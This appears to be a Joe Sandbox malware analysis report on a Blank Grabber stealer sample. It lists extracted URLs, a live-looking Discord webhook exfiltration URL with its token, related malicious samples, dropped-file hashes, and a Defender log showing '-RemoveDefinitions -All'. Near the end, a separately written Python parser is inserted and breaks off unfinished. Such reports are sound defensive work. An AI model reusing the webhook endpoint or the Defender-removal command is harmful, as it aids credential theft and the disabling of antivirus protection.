http://google.com/ | X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp | false | high
http://ocsp.sectigo.com0 | X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.dr | false | high
https://tools.ietf.org/html/rfc7231#section-4.3.6) | X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2E41000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmp | false | high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN | X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discordapp.com/api/v9/users/ | X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmp | false | high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source | X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp | false | high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec | X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmp | false | high
https://github.com/urllib3/urllib3/issues/2920 | X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp | false | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.dr | false | high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data | X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp | false | high
https://yahoo.com/ | X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmp | false | high
https://account.bellmedia.c | X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38BC000.00000004.00001000.00020000.00000000.sdmp | false | high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | X9g8L63QGs.exe, 00000007.00000003.1291153468.000001E7C2E93000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2E8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp | false | high
https://login.microsoftonline.com | X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3898000.00000004.00001000.00020000.00000000.sdmp | false | high
http://cacerts.digicert.co | X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | false | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.dr | false | high
https://html.spec.whatwg.org/multipage/ | X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2D9A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2D99000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.ifeng.com/ | X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | false | high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings | X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmp | false | high
https://www.zhihu.com/ | X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1 | X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://oneget.orgX | powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.gofile.io/getServerrz | X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmp | false | high
http://crl.micr | powershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://discord.com/api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb | X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmp | false | high
https://api.gofile.io/getServer | X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp | false | high
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | X9g8L63QGs.exe, 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp | false | high
http://nuget.org/NuGet.exe | powershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584308
Start date and time: 2025-01-05 07:18:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 119
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: X9g8L63QGs.exe (renamed because original name is a hash value)
Original Sample Name: 006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@176/56@4/2
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 98%
                                                                                                                                                                                                                          • Number of executed functions: 85
                                                                                                                                                                                                                          • Number of non-executed functions: 188
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.131, 13.107.246.45, 52.149.20.212
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7276 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3920 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:19:11 | API Interceptor | 8x Sleep call for process: WMIC.exe modified
01:19:14 | API Interceptor | 145x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1
• 9g9LZNE4bH.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
• riFSkYVMKB.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
• ddos tool.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
• kthiokadjg.exe | malicious | Blackshades | ip-api.com/json/
• file.exe | malicious | AsyncRAT, XRed, XWorm | ip-api.com/line/?fields=hosting
• file.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
• file.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
• 23khy505ab.exe | malicious | Njrat | ip-api.com/line/?fields=hosting
• XClient.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
• Java32.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
162.159.137.232
• 9g9LZNE4bH.exe | malicious | Blank Grabber
• rename_me_before.exe | malicious | Python Stealer, Exela Stealer
• arm.elf | malicious | Unknown
• Bloxflip Predictor.exe | malicious | Njrat
• phost.exe | malicious | Blank Grabber
• WE8zqotCFj.exe | malicious | Blank Grabber, Umbral Stealer
• EsgeCzT4do.exe | malicious | XWorm
• program.exe | malicious | Blank Grabber
• NEVER OPEN!.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer
• YDW0S5K7hi.exe | malicious | SilverRat
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com
• 9g9LZNE4bH.exe | malicious | Blank Grabber | 162.159.137.232
• riFSkYVMKB.exe | malicious | Blank Grabber | 162.159.138.232
• AimStar.exe | malicious | Blank Grabber | 162.159.128.233
• rename_me_before.exe | malicious | Python Stealer, Exela Stealer | 162.159.137.232
• Fizzy Loader.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.138.232
• Jx6bD8nM4qW9sL3v.exe | malicious | Unknown | 162.159.128.233
• dsoft.exe | malicious | Python Stealer, Creal Stealer | 162.159.138.232
• DHL AWB-documents.lnk | malicious | Divulge Stealer | 162.159.138.232
• http://mee6.xyz | malicious | Unknown | 162.159.138.232
• YF3YnL4ksc.exe | malicious | Unknown | 162.159.136.232
ip-api.com
• 9g9LZNE4bH.exe | malicious | Blank Grabber | 208.95.112.1
• riFSkYVMKB.exe | malicious | Blank Grabber | 208.95.112.1
• ddos tool.exe | malicious | XWorm | 208.95.112.1
• kthiokadjg.exe | malicious | Blackshades | 208.95.112.1
• file.exe | malicious | AsyncRAT, XRed, XWorm | 208.95.112.1
• file.exe | malicious | XWorm | 208.95.112.1
• file.exe | malicious | XWorm | 208.95.112.1
• 23khy505ab.exe | malicious | Njrat | 208.95.112.1
• XClient.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
• Java32.exe | malicious | XWorm | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
• https://bit.ly/3VYGxmh | malicious | CAPTCHA Scam ClickFix, Phisher | 104.18.95.41
• armv6l.elf | malicious | Unknown | 198.41.197.77
• Yoranis Setup.exe | malicious | Unknown | 172.64.41.3
• Yoranis Setup.exe | malicious | Unknown | 104.26.13.205
• file.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
• file.exe | malicious | LummaC, PureLog Stealer | 104.21.64.1
• J18zxRjOes.exe | malicious | LummaC | 104.21.56.70
• SOElePqvtf.exe | malicious | LummaC
                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                              m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                              ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                                                                                              TUT-ASUS9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
No context

Match | Associated Sample Name | Detection | Threat Name

C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | riFSkYVMKB.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | mcgen.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | AimStar.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | DChOtFdp9T.exe | malicious | CobaltStrike, Metasploit
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | user.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | HX Design.exe | malicious | Python Stealer, Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | wp-s2.exe | malicious | Python BackDoor
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | wp-s2.exe | malicious | Python BackDoor
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | wp-cent.exe | malicious | Python BackDoor

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 704614
Entropy (8bit): 7.928954301831258
Encrypted: false
SSDEEP: 12288:0c7tSGZGc9BAsHal6UbsLWARajo9MqDD97yLa6:RMGREstLvajoqqDD97yLl
MD5: 6BBA932E5A8FA36282638D177E2FAB9C
SHA1: 8EC3C63BD08763F7CE4C8FAA18B8EEF10E049EEA
SHA-256: 9724B01C774130C74D9BBA865A280DC11C7A8D92E5244A3516C49B089ABB68E6
SHA-512: 8855D8EA9A14E2DCF10064F798902F446195CFA1C1F0B904B9C5888D2BEA0FB446810404E299D778E3457EDB20CEB8733120CF10E730B3CFCA17E3CC08F4FF02
Malicious: false
Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....fWy..........g.n...[u......3U3m.g@.r.9@#.....%$.b...P. ...cYBB......s.$...[.........sN.i.._.......w.......tN.y5.<.....NM.h..^..0..)k....3.3m._...I...'>..s.DA7}..dM..L.0I..g.....Wl6...........86...'...<.V.z|$&..O..{T.w..GN.....e...a..}..6./<:...N....i..!.C.....{h.r...J.....DA.3....kY.....O.7..'....'DZ?.....`...i........Ew...?....L...2......q............}..[..o0..>Wj'....,./f.=?.,xw........(S.h.X9..w.}.......}.w..`....Nw.U..T..q{.p.mSX..[3.o.%......./,X...c...}s.y[b..\?.....L...{.,.;.....j`.y..qcF.=ojcK.v[.x...7T...>C_,N.....uc.-...j..)g..?...uw.........uUg.ks...=.gK1.....v..Z.r..v...G......pu.c. .....zl"]...8,..j..i....vLs;\..n.u.[..M.]....wJ.wL.nwu.......>}....Ll.e.....x.t..v..A.[..5..;..&|--1..8}.E._.[..[.].....Wd..s=l.......[].Y......g..l}e..#6.U.w.t.-~PMl~y./.:}....f...>G..m...>h/....*..2.m..V...M/..l.....'.3..-.:....|.../...\..:._.c....

Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: modified
Size (bytes): 894
Entropy (8bit): 3.1099977634615996
Encrypted: false
SSDEEP: 12:Q58KRBubdpkoPAGdjrZ+rAk9+MlWlLehW51IC4+rp:QOaqdmOFdjrQrj+kWResLI4rp
MD5: 65519ADC656DEF71C20A51D6CFEE2713
SHA1: B1E796133941557AD29B9D7F450ADA24634ACC6A
SHA-256: 0D122BF9E377907D9F9A3040508B08DEFE56362ECC6156AEAF98D9038F6E84AA
SHA-512: E4B9AD5C8C6E00F7BDFA478D9C2D7B39A4F783A9F82FE75C4ACD2EE7E25A2A0E1A42E40D0949945FBA0BE487AA8491F234D3E797C21535D46D459AAA2736743F
Malicious: false
Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.2.:.3.6.:.1.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.2.:.3.6.:.1.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
Preview decoded from UTF-16LE (this is Defender's own MpCmdRun.log record of the signature-removal run flagged in the signature list):
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe"  -RemoveDefinitions -All
 Start Time: Sun Jan 05 2025 02:36:10

MpEnsureProcessMitigationPolicy: hr = 0x1
Start: MpRemoveDefinitions(1)
MpCmdRun: End Time: Sun Jan 05 2025 02:36:10
-------------------------------------------------------------------------------------

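The MpCmdRun.log record above is the host-side evidence that Defender's definitions were removed. The following Python is an added example for this report, not Joe Sandbox or Blank Grabber code: it reads the log as Defender writes it (UTF-16LE with a BOM and CRLF line endings, exactly the file type shown above; on a live host the file normally lives at C:\ProgramData\Microsoft\Windows Defender\Support\MpCmdRun.log), groups it into one entry per "MpCmdRun: Command Line:" block, and flags runs that removed definitions. The sample log is constructed from the decoded preview plus an invented benign -SignatureUpdate run so the filter has something to ignore; the function names and the switch table are this example's own assumptions.

```python
"""Parse Windows Defender's MpCmdRun.log and flag definition-removal runs.

Added example; not Joe Sandbox or Blank Grabber code. Function names and the
TAMPER_SWITCHES table are this example's own choices.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SEP = "-" * 85

# Constructed sample: the run recovered from the dropped-file preview above,
# followed by an invented benign -SignatureUpdate run. U+200E marks are the
# left-to-right marks Windows date formatting inserts into the log.
_SAMPLE_LINES = [
    SEP,
    'MpCmdRun: Command Line: "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"  -RemoveDefinitions -All',
    " Start Time: \u200eSun \u200eJan \u200e05 \u200e2025 02:36:10",
    "",
    "MpEnsureProcessMitigationPolicy: hr = 0x1",
    "Start: MpRemoveDefinitions(1)",
    "MpCmdRun: End Time: \u200eSun \u200eJan \u200e05 \u200e2025 02:36:10",
    SEP,
    'MpCmdRun: Command Line: "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -SignatureUpdate',
    " Start Time: \u200eSun \u200eJan \u200e05 \u200e2025 02:40:00",
    "MpCmdRun: End Time: \u200eSun \u200eJan \u200e05 \u200e2025 02:40:05",
    SEP,
]
# Encoded the way Defender writes the file: UTF-16LE with BOM, CRLF terminators.
SAMPLE_LOG = b"\xff\xfe" + ("\r\n".join(_SAMPLE_LINES) + "\r\n").encode("utf-16-le")


@dataclass
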